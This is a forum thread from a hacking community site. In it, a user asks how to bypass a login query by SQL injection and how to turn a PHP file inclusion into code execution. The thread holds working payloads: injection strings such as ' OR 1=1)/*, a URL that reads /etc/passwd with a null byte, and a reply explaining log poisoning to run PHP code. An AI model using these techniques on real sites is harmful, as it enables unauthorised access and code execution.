Follow us on Twitter!
Things are more like they are now than they have ever been before. - Dwight D. Eisenhower
Wednesday, April 23, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 21
Guests Online: 21
Members Online: 0

Registered Members: 82876
Newest Member: bhl1986
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Author

sql Injection + php page inclusion


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 23-09-11 17:08
Hi

mysql Puzzle

Im so close but Im missing something here. If mysql is vulnerable from a login point of view
the username and password fields below are vulnerable to injection and there values are changeable from the login.php page

How do you by pass the status='1'..

Im asking how do you terminate the query after the "password="secret" "

None of these are my answer I dont think

' or '1'='1' -- '
' or '1'='1' ({ '
' or '1'='1' /* '




select * from user WHERE ( username = 'bob'' and password = 'secret' and status='1' )



php Help

Also if a url can include a file as follows

http:/www.******/index.php?page=/etc/passwd%00
(the above prints out the file contents)

But how do i execute a command or arbitary php code via the url

Is it possible to close the php syntax in the base code like so

include('/etc/passwd'Wink

im not 100% sure Iv asked the questions correctly but any guidance would be appreciated.....

im a white hat :-)


Author

RE: sql Injection + php page inclusion


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 23-09-11 18:18
Try this
' OR 1=1)/*
Are you getting any errors?

But how do i execute a command or arbitary php code via the url


Inject some log with with your code and then include the page you injected. For example, if you can find (I'm assuming this server is running apache) the error_log file, then telnet to the site and do something like:

GET /<?php code here ?> HTTP/1.1

P.S., I don't care if you're white hat or not.